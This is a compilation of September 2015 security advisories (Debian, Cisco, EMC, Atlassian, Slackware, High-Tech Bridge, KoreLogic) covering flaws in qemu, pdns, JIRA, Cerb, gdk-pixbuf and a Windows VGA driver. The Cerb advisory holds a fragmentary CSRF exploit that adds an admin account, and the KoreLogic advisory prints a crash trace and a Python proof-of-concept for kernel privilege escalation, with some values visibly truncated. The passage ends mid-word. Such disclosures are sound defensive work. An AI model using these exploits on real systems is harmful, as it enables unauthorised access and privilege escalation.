[SECURITY] [DSA 3348-1] qemu security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-3348-1 secur...@debian.org https://www.debian.org/security/ Salvatore Bonaccorso September 02, 2015https://www.debian.org/security/faq - - Package: qemu CVE ID : CVE-2015-3214 CVE-2015-5154 CVE-2015-5165 CVE-2015-5225 CVE-2015-5745 Debian Bug : 793811 794610 795087 795461 796465 Several vulnerabilities were discovered in qemu, a fast processor emulator. CVE-2015-3214 Matt Tait of Google's Project Zero security team discovered a flaw in the QEMU i8254 PIT emulation. A privileged guest user in a guest with QEMU PIT emulation enabled could potentially use this flaw to execute arbitrary code on the host with the privileges of the hosting QEMU process. CVE-2015-5154 Kevin Wolf of Red Hat discovered a heap buffer overflow flaw in the IDE subsystem in QEMU while processing certain ATAPI commands. A privileged guest user in a guest with the CDROM drive enabled could potentially use this flaw to execute arbitrary code on the host with the privileges of the hosting QEMU process. CVE-2015-5165 Donghai Zhu discovered that the QEMU model of the RTL8139 network card did not sufficiently validate inputs in the C+ mode offload emulation, allowing a malicious guest to read uninitialized memory from the QEMU process's heap. CVE-2015-5225 Mr Qinghao Tang from QIHU 360 Inc. and Mr Zuozhi from Alibaba Inc discovered a buffer overflow flaw in the VNC display driver leading to heap memory corruption. A privileged guest user could use this flaw to mount a denial of service (QEMU process crash), or potentially to execute arbitrary code on the host with the privileges of the hosting QEMU process. CVE-2015-5745 A buffer overflow vulnerability was discovered in the way QEMU handles the virtio-serial device. A malicious guest could use this flaw to mount a denial of service (QEMU process crash). For the oldstable distribution (wheezy), these problems have been fixed in version 1.1.2+dfsg-6a+deb7u9. The oldstable distribution is only affected by CVE-2015-5165 and CVE-2015-5745. For the stable distribution (jessie), these problems have been fixed in version 1:2.1+dfsg-12+deb8u2. For the unstable distribution (sid), these problems have been fixed in version 1:2.4+dfsg-1a. We recommend that you upgrade your qemu packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCgAGBQJV5yHbAAoJEAVMuPMTQ89EL2EQAJRkjczhzMQFzfjym14afASB pr7b2Hu/M5i+hyuSr8Pv8G2zuEw2o60ezqcseuG2153hZs/yX0yk8qltwuTdLdMk At2FMs98XiD8xKY4mpCKHSdXcY+Cl7cjmogkcUe84dG4xfT5HUTOpZ7b2Ei22gOr lUmFf5SdG7yhsEk12sne06ArJh7AuDEUa9ltc+cH2+2091itC9DwflRf2y7NmYaf kM47ZBcMfmUxGbMPPxBV19T2L6ts1zTcPKMkE4FynDDsTzqDg5ndz8clBHKRF70x ltEXjTD1gLoJkNFGo2UrnfTHlu8UO5OAx1C1si+rtt8/93ran8IXaOO+u/AssqPU Jzwo2j4zOSLnSMlo722NuneqkneaTQabLM1tROpTOgRTXHmIvG1Uls6Rx5tQOUbZ wMszAC9aRQZiZ32yjUu0cVu7bsSIRzadNPjW3WzljtRGSEPYUg/pLicnAC+Bq6mu MOYllYs3nhybZoQ6NjFrJfA+sCjZuNmDhh5a3QUb/cjckygf2QMN8YBSoPy2khqX y8hTUcrYfmsJo5/rvAkki6kxOJiqK+8+fiw0ARcAOkOIOuP4tcExTwjfNBXtWgR6 ZHZOTA68XdkptRhYnlSfAUkhR06vP6q63k/hjR+7syWu6e9n+4cq/moEdUh+77Xo ULvsd7J2ar7JOVZ9HpWS =QpIk -END PGP SIGNATURE-
[SECURITY] [DSA 3349-1] qemu-kvm security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-3349-1 secur...@debian.org https://www.debian.org/security/ Salvatore Bonaccorso September 02, 2015https://www.debian.org/security/faq - - Package: qemu-kvm CVE ID : CVE-2015-5165 CVE-2015-5745 Several vulnerabilities were discovered in qemu-kvm, a full virtualization solution on x86 hardware. CVE-2015-5165 Donghai Zhu discovered that the QEMU model of the RTL8139 network card did not sufficiently validate inputs in the C+ mode offload emulation, allowing a malicious guest to read uninitialized memory from the QEMU process's heap. CVE-2015-5745 A buffer overflow vulnerability was discovered in the way QEMU handles the virtio-serial device. A malicious guest could use this flaw to mount a denial of service (QEMU process crash). For the oldstable distribution (wheezy), these problems have been fixed in version 1.1.2+dfsg-6+deb7u9. We recommend that you upgrade your qemu-kvm packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCgAGBQJV5yHRAAoJEAVMuPMTQ89EB2kP/AtJsGcAf37Nthx8tbD6/LUM 6Ou6bDZBoxgFGgtlM9ijK9W1lN9m7UoJBNgOLMGSDha6xCDhUlNk6r/yyR/3bRnh Ij2xbQwFMvbB8IG88I7H62YpZihY7O/9vqSYW/ZIu7tL4DAQNHctGZ1XocUiHh8i Ar/gE8bQSDKpx3XG/ZmlniBjozXEcHPc7WDM5eHU1bekwJ5MlO9S+l7ikAptVWMt fDT7pS1YcGmYftIYtt7MySTHl9F3ThcWBMuY+GeZnF9zQh0N8ltNtvaO87uJ1Oke qSDzPKoIy6Q1Cw6SEVloBASzsB7BFu7q8S7Zx6DKVDrS43JZNnXj7xX3DXtIGvtC yXr+xx15tk8oBVYQpg0kBgZjcU5IXC/zjL8KCzj2Nt8+e1w7ufcdgisp9X91hN5c t/kJmTI8wj0xT0UYCjCfdPLQr1U8ph5fk5coZkt6YVWkWCp1L1fSLDAhkcqM60ql ORZwyM7m3ZtoMRfAKNdJgjTHTyijE8CAsQDGcINEkhqz26gFuaU5TnkD/Ls5z0cc ZwTjXpd1VrCYUB0wkdbXWDtsAIZR4nmxl43Z9lOOXRgCMysakmTGYluFW2ypEhrB fqvXfYzV8assVcLyXnWyq8Ewh7OjX26Y5OlczgxHyBCDp2HK2ragzf93cYJL1v8t 6AheWSuueDqSs2b11Z8J =9NK7 -END PGP SIGNATURE-
Cisco Security Advisory: Cisco Integrated Management Controller Supervisor and Cisco UCS Director Remote File Overwrite Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Cisco Integrated Management Controller Supervisor and Cisco UCS Director Remote File Overwrite Vulnerability Advisory ID: cisco-sa-20150902-cimcs Revision 1.0 For Public Release 2015 September 2 16:00 UTC (GMT) +--- Summary === Cisco Integrated Management Controller (IMC) Supervisor and Cisco UCS Director contain a remote file overwrite vulnerability that could allow an unauthenticated, remote attacker to overwrite arbitrary system files, resulting in system instability or a denial of service (DoS) condition. Cisco has released software updates that address this vulnerability. Workarounds that mitigate this vulnerability are not available. This advisory is available at the following link: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150902-cimcs -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (SunOS) iQIVAwUBVecfnYpI1I6i1Mx3AQJNLhAAv2JmmTi39Ct3ih17a1XmdKxZxDhb33W0 ++lYBipYbO9zgH6HaRjAX/CxG09vglgv3tyeEquFtVCGvBEs0x/PC8w7wig+VzlH nXc8OgOMJlAnCuIn81cQra2SWtmVU2oaAbcQS9p3/uDNB3op+cPvkDJFTet9UX72 HC1CItpmUDWefKW44xeGNQ+8IsMBkBxOdHiyDmucu1zLXcg9hpxr56LDpDd8i61U kJorlCVMnWrTzbgV1jtILxQ73PE2tlKyaVZamks2ODzF1wj4E8dkfAAiOHKCPMaP BWSztYrybAfRbAqfkA+2FpOe6Cgd8S4O+01+4CbOwWjRpoqZhkVFnQgu21AymYxe 4q3y7KWw2IKLCrmHnjFlWs3687uoxUaxIiyxXozn/7U8bU05lh1c9eZH0KY+9cBo O9VsM/d0YN68JaI5PDpAlqXssS9qYUrEbFu3Rdus2ss87yZi27e1Q4N9hMyJ1fo0 Wu6OqiuHLD1JTv059dXPDfmgDvt+0zuilmWoGKY5i7OAbSw8GhQVJ9Q3wdBdfYeX 8cBO+tt0xvVTMOz9mpBRx5a9dJXUo/Z5L5mi7n9jtfqqvrR9iDjZR3xVTqYXh+6M Xtj0Q0J/VZV+ZCVWz0xXJoqBvtPnw47xbMcx7n1t8jR8bgk9+MS/0/E/cV1239K/ 0JdOpPTLlXM= =1xLQ -END PGP SIGNATURE-
[SECURITY] [DSA 3347-1] pdns security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-3347-1 secur...@debian.org https://www.debian.org/security/ Sebastien Delafond September 02, 2015https://www.debian.org/security/faq - - Package: pdns CVE ID : CVE-2015-5230 Pyry Hakulinen and Ashish Shakla at Automattic discovered that pdns, an authoritative DNS server, was incorrectly processing some DNS packets; this would enable a remote attacker to trigger a DoS by sending specially crafted packets causing the server to crash. For the stable distribution (jessie), this problem has been fixed in version 3.4.1-4+deb8u3. For the testing distribution (stretch) and unstable distribution (sid), this problem has been fixed in version 3.4.6-1. We recommend that you upgrade your pdns packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v2 iQEcBAEBCgAGBQJV5wINAAoJEBC+iYPz1Z1kT9AIAJP2pMIbvung1B0EYDD/+YgT nCqMFEhT+3miAmBMoDiOYE9K4dhLQAHQD+9YEVFfwcF9IV87mkkBhcCK5lLgQqfj xtNVcrRxCZlI/jdoVAzP6IhMlhkbAgTIFFGxegbIVx9bgsAs1wR2LpiCPZb3SZim ZaabfmyUMQfN9xlNbptVSNf08iGGvRTm3wAAGRbeM/DqRPjM5Gk/X7O7qlH8Z9mB 04//RtPzyohQOGMWkEF3oqCicVQRHKFIdB6FvJH9r9cnGghjLxgFfeLT1tqrRnDg csR4renxQZU/3ztReyibd/amTCpqKfe0ixsYR/PE71czqGmgatcptj2E03+UKa4= =gxuU -END PGP SIGNATURE-
ESA-2015-137: EMC Atmos XML External Entity Injection Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ESA-2015-137: EMC Atmos XML External Entity Injection Vulnerability EMC Identifier: ESA-2015-137 CVE Identifier: CVE-2015-4538 Severity Rating: CVSS v2 Base Score: 7.5 (AV:N/AC:L/Au:S/C:C/I:N/A:P) Affected products: EMC Atmos 2.3.0 and earlier Summary: EMC Atmos includes a XML External Entity Injection vulnerability. Details: EMC Atmos is affected by a XML External Entity (XXE) Injection vulnerability due to the configuration of the XML parser shipped with the product. A XXE Injection attack may occur when XML input containing a reference to an external entity is processed by an affected XML parser. XXE Injection might allow attackers to gain unauthorized access to files containing sensitive information or might be used to cause denial-of-service. Resolution: The following EMC Atmos release contains the fix for this vulnerability: EMC Atmos version 2.3.1.0 EMC Atmos version 2.2.3.0 with Hot Fix 2.2.3.426 EMC recommends all customers upgrade at the earliest opportunity. Link to remedies: Customers must contact EMC Customer Technical Support for information about applying the hotfixes or upgrading. Read and use the information in this EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact EMC Software Technical Support at 1-877-534-2867. For an explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability. EMC recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event, shall EMC or its suppliers, be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply. EMC Product Security Response Center security_al...@emc.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.13 (Cygwin) iEYEARECAAYFAlXm/cAACgkQtjd2rKp+ALzk4QCeLQ4oZHE7ObleviR6F6z3O8jS N2oAoOJjL490QBX90zVzssgmRmYRQ7Bd =SUeP -END PGP SIGNATURE-
Cross-Site Request Forgery in Cerb
Advisory ID: HTB23269
Product: Cerb
Vendor: Webgroup Media LLC
Vulnerable Version(s): 7.0.3 and probably prior
Tested Version: 7.0.3
Advisory Publication: August 12, 2015 [without technical details]
Vendor Notification: August 12, 2015
Vendor Patch: August 14, 2015
Public Disclosure: September 2, 2015
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2015-6545
Risk Level: Medium
CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab (
https://www.htbridge.com/advisory/ )
---
Advisory Details:
High-Tech Bridge Security Research Lab discovered CSRF vulnerability in Cerb
platform, which can be exploited to perform Cross-Site Request Forgery attacks
against administrators of vulnerable web application to add administrate
accounts into the system.
The vulnerability exists due to failure of the "/ajax.php" script to properly
verify the source of incoming HTTP request. Taking into consideration that Cerb
is a business-critical application, this security flaw may be quite dangerous
if exploited by malicious attackers.
A simple exploit below will add admin user into the system when a logged-in
victim opens a malicious page with the exploit:
http://[host]/ajax.php"; method = "POST">
document.getElementById('btn').click();
---
Solution:
Update to Cerb 7.0.4
More Information:
https://github.com/wgm/cerb/commit/12de87ff9961a4f3ad2946c8f47dd0c260607144
http://wiki.cerbweb.com/7.0#7.0.4
---
References:
[1] High-Tech Bridge Advisory HTB23269 -
https://www.htbridge.com/advisory/HTB23269 - Cross-Site Request Forgery in Cerb.
[2] Cerb - http://www.cerberusweb.com/ - Cerb is a fast and flexible platform
for enterprise collaboration, productivity, and automation.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ -
international in scope and free for public use, CVE® is a dictionary of
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to
developers and security practitioners, CWE is a formal list of software
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual
web application penetration test and cutting-edge vulnerability scanner
available online via a Software-as-a-Service (SaaS) model.
---
Disclaimer: The information provided in this Advisory is provided "as is" and
without any warranty of any kind. Details of this Advisory may be updated in
order to provide as accurate information as possible. The latest version of the
Advisory is available on web page [1] in the References.
[slackware-security] gdk-pixbuf2 (SSA:2015-244-01)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [slackware-security] gdk-pixbuf2 (SSA:2015-244-01) New gdk-pixbuf2 packages are available for Slackware 13.37, 14.0, 14.1, and -current to fix a security issue. Here are the details from the Slackware 14.1 ChangeLog: +--+ patches/packages/gdk-pixbuf2-2.28.2-i486-2_slack14.1.txz: Rebuilt. Gustavo Grieco discovered a heap overflow in the processing of BMP images which may result in the execution of arbitrary code if a malformed image is opened. For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4491 (* Security fix *) +--+ Where to find the new packages: +-+ Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/gdk-pixbuf2-2.23.3-i486-2_slack13.37.txz Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/gdk-pixbuf2-2.23.3-x86_64-2_slack13.37.txz Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/gdk-pixbuf2-2.26.1-i486-3_slack14.0.txz Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/gdk-pixbuf2-2.26.1-x86_64-3_slack14.0.txz Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/gdk-pixbuf2-2.28.2-i486-2_slack14.1.txz Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/gdk-pixbuf2-2.28.2-x86_64-2_slack14.1.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/gdk-pixbuf2-2.31.7-i586-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/gdk-pixbuf2-2.31.7-x86_64-1.txz MD5 signatures: +-+ Slackware 13.37 package: 024660dd36a58ffa0793aeb1396e57c7 gdk-pixbuf2-2.23.3-i486-2_slack13.37.txz Slackware x86_64 13.37 package: d9db7b242d5e68f6032f80af8359563d gdk-pixbuf2-2.23.3-x86_64-2_slack13.37.txz Slackware 14.0 package: 63d1deaa9e336c09c23025b4d8f8b545 gdk-pixbuf2-2.26.1-i486-3_slack14.0.txz Slackware x86_64 14.0 package: c2c2e3211a590b125d9e1e1c61e243ed gdk-pixbuf2-2.26.1-x86_64-3_slack14.0.txz Slackware 14.1 package: 0e83c834301e53e29bf47a5d6818769d gdk-pixbuf2-2.28.2-i486-2_slack14.1.txz Slackware x86_64 14.1 package: fcc65f4ec956dcc34f7f378e272e600d gdk-pixbuf2-2.28.2-x86_64-2_slack14.1.txz Slackware -current package: 41baa15dd4e8a2b9527d7582aa2902d8 l/gdk-pixbuf2-2.31.7-i586-1.txz Slackware x86_64 -current package: 35b915dd5a87fec81db379e07652e74a l/gdk-pixbuf2-2.31.7-x86_64-1.txz Installation instructions: ++ Upgrade the package as root: # upgradepkg gdk-pixbuf2-2.28.2-i486-2_slack14.1.txz +-+ Slackware Linux Security Team http://slackware.com/gpg-key secur...@slackware.com ++ | To leave the slackware-security mailing list: | ++ | Send an email to majord...@slackware.com with this text in the body of | | the email message: | || | unsubscribe slackware-security | || | You will get a confirmation message back containing instructions to| | complete the process. Please do not reply to this email address. | ++ -BEGIN PGP SIGNATURE- Version: GnuPG v1 iEYEARECAAYFAlXmNWgACgkQakRjwEAQIjNL3ACdGXTddA/8OaDnF+F3MtCC+D1I 54kAn3Qa/pBElZQjCOCnKlIm0FG+hkfI =sBIZ -END PGP SIGNATURE-
CVE-2015-5603: JIRA and the HipChat For JIRA plugin - Velocity Template Injection
Note: the current version of this advisory can be found at https://confluence.atlassian.com/x/IcBKLg . CVE ID: CVE-2015-5603 Product: JIRA and the HipChat for JIRA plugin. Affected HipChat For JIRA plugin versions: 1.3.2 <= version < 6.30.0 Affected JIRA product versions: 6.3.5 <= version < 6.4.11 Summary: This advisory discloses a critical severity security vulnerability that was introduced in version 1.3.2 of the HipChat for JIRA plugin. Versions of the HipChat for JIRA plugin starting with 1.3.2 before 6.30.0 (the fixed version) are vulnerable. Vulnerable versions of the HipChat for JIRA plugin were bundled by default with JIRA since JIRA version 6.3.5, up to but not including 6.4.11 (the fixed version). Atlassian Cloud instances have already been upgraded to a version of the HipChat for JIRA plugin which does not have the issue described in this email. Customers who have updated the HipChat For JIRA plugin to version 6.30.0 or higher are not affected. Customers who have downloaded and installed JIRA >= 6.3.5 < 6.4.11 and have not updated the HipChat For JIRA plugin to 6.30.0 or higher should either update those instances of the HipChat For JIRA plugin for their JIRA installations in order to fix this vulnerability. Customers who have installed the HipChat For JIRA plugin in JIRA, and are running a version of the plugin equal to or above 1.3.2 and less than 6.30.0 should either update those instances of the HipChat For JIRA plugin or their JIRA installations to fix this vulnerability. Severity: Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels (https://www.atlassian.com/security/security-severity-levels). The scale allows us to rank a severity as critical, high, moderate, or low. This is an independent assessment and you should evaluate its applicability to your own IT environment. Description: We internally discovered that the HipChat For JIRA plugin had a resource that combined user input into a velocity template source and subsequently rendered it. Authenticated attackers can use this vulnerability to execute Java code of their choice on systems that have a vulnerable version of the HipChat For JIRA plugin enabled. To exploit this issue attackers need to be able to access the JIRA web interface and log into JIRA. All versions of HipChat For JIRA plugin from 1.3.2 before 6.30.0 are affected by this vulnerability. All versions of JIRA from 6.3.5 before 6.4.11 are affected by this vulnerability. This issue can be tracked here: https://jira.atlassian.com/browse/JRA-44831 Fix: We have taken the follow steps to address this issue: Released a new version, 6.30.0, of the HipChat For JIRA plugin Released JIRA version 6.4.11 that updates the bundled copy of the HipChat For JIRA plugin to a fixed version. Remediation: Upgrade the HipChat for JIRA plugin to version 6.30.0 or higher. For instructions on how to update add-ons like the HipChat For JIRA plugin see https://confluence.atlassian.com/display/UPM/Updating+add-ons. Optionally upgrade JIRA to version 6.4.11 which bundles a fixed version of the HipChat For JIRA plugin. Risk Mitigation: If you are unable to upgrade your JIRA server or the HipChat for JIRA plugin, then as a temporary workaround, you can disable or uninstall the HipChat For JIRA plugin in JIRA. Support: If you have questions or concerns regarding this advisory, please raise a support request at https://support.atlassian.com/ . -- David Black / Security Engineer.
KL-001-2015-004 : XGI Windows VGA Display Manager Arbitrary Write Privilege Escalation
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256
KL-001-2015-004 : XGI Windows VGA Display Manager Arbitrary Write
Privilege Escalation
Title: XGI Windows VGA Display Manager Arbitrary Write Privilege Escalation
Advisory ID: KL-001-2015-004
Publication Date: 2015.09.01
Publication URL:
https://www.korelogic.com/Resources/Advisories/KL-001-2015-004.txt
1. Vulnerability Details
Affected Vendor: Silicon Integrated Systems Corporation
Affected Product: XGI VGA Display Manager
Affected Version: 6.14.10.1090
Platform: Microsoft Windows XP SP3
CWE Classification: CWE-123: Write-what-where condition
Impact: Arbitrary Code Execution
Attack vector: IOCTL
CVE-ID: CVE-2015-5466
2. Vulnerability Description
A vulnerability within the xrvkp module allows an attacker
to inject memory they control into an arbitrary location they
define. This vulnerability can be used to overwrite function
pointers in HalDispatchTable resulting in an elevation of
privilege.
3. Technical Description
Windows XP Kernel Version 2600 (Service Pack 3) UP Free x86 compatible
Product: WinNt, suite: TerminalServer SingleUserTS
Built by: 2600.xpsp_sp3_qfe.101209-1646
Machine Name:
Kernel base = 0x804d7000 PsLoadedModuleList = 0x805540c0
***
*
*
*Bugcheck Analysis
*
*
*
***
Use !analyze -v to get detailed debugging information.
BugCheck 50, {, 1, 804f3b76, 0}
Probably caused by : xrvkp.sys ( xrvkp+6ec )
Followup: MachineOwner
-
kd> kn
Call stack: # ChildEBP RetAddr
00 f63fd9a0 8051cc7f nt!KeBugCheckEx+0x1b
01 f63fda00 805405d4 nt!MmAccessFault+0x8e7
02 f63fda00 804f3b76 nt!KiTrap0E+0xcc
03 f63fdad0 804fdaf1 nt!IopCompleteRequest+0x92
04 f63fdb20 806d3c35 nt!KiDeliverApc+0xb3
05 f63fdb20 806d3861 hal!HalpApcInterrupt+0xc5
06 f63fdba8 804fab03 hal!KeReleaseInStackQueuedSpinLock+0x11
07 f63fdbc8 804f07e4 nt!KeInsertQueueApc+0x4b
08 f63fdbfc f7b136ec nt!IopfCompleteRequest+0x1d8
09 f63fdc34 804ee129 xrvkp+0x6ec
0a f63fdc44 80574e56 nt!IopfCallDriver+0x31
0b f63fdc58 80575d11 nt!IopSynchronousServiceTail+0x70
0c f63fdd00 8056e57c nt!IopXxxControlFile+0x5e7
0d f63fdd34 8053d6d8 nt!NtDeviceIoControlFile+0x2a
0e f63fdd34 7c90e514 nt!KiFastCallEntry+0xf8
0f 0021f3e4 7c90d28a ntdll!KiFastSystemCallRet
10 0021f3e8 1d1add7a ntdll!ZwDeviceIoControlFile+0xc
11 0021f41c 1d1aca96 _ctypes!DllCanUnloadNow+0x5b4a
12 0021f44c 1d1a8db8 _ctypes!DllCanUnloadNow+0x4866
13 0021f4fc 1d1a959e _ctypes!DllCanUnloadNow+0xb88
14 0021f668 1d1a54d8 _ctypes!DllCanUnloadNow+0x136e
15 0021f6c0 1e07bd9c _ctypes+0x54d8
16 python27!PyObject_Call+0x4c
4. Mitigation and Remediation Recommendation
No response from vendor; no remediation available.
5. Credit
This vulnerability was discovered by Matt Bergin of KoreLogic
Security, Inc.
6. Disclosure Timeline
2015.05.14 - Initial contact; requested security contact.
2015.05.18 - Second contact attempt.
2015.05.25 - Third contact attempt.
2015.07.02 - KoreLogic requests CVE from Mitre.
2015.07.10 - Mitre issues CVE-2015-5466.
2015.07.28 - 45 business days have elapsed since KoreLogic last
attempted to contact SiS without a response.
2015.09.01 - Public disclosure.
7. Proof of Concept
from sys import exit
from ctypes import *
NtAllocateVirtualMemory = windll.ntdll.NtAllocateVirtualMemory
WriteProcessMemory = windll.kernel32.WriteProcessMemory
DeviceIoControl = windll.ntdll.NtDeviceIoControlFile
CreateFileA = windll.kernel32.CreateFileA
CloseHandle = windll.kernel32.CloseHandle
FILE_SHARE_READ,FILE_SHARE_WRITE = 0,1
OPEN_EXISTING = 3
NULL = None
device = "xgikp"
code = 0x96002404
inlen = 0xe6b6
outlen = 0x0
inbuf = 0x1
outbuf = 0x
inBufMem = "\x90"*inlen
def main():
try:
handle = CreateFileA(".\\%s" %
(device),FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)
if (handle == -1):
print "[-] error creating handle"
exit(1)
except Exception as e:
print "[-] error creating handle"
exit(1)
NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0x)),0x1000|0x2000,0x40)
WriteProcessMemory(-1,0x1,inBufMem,inlen,byref(c_int(0)))
DeviceIoControl(handle,NULL,NULL,NULL,byref(c_ulong(8)),code,0x1,inlen,outbuf,outlen)
CloseHandle(handle)
return False
if __name__=="__main__":
main()
The contents o
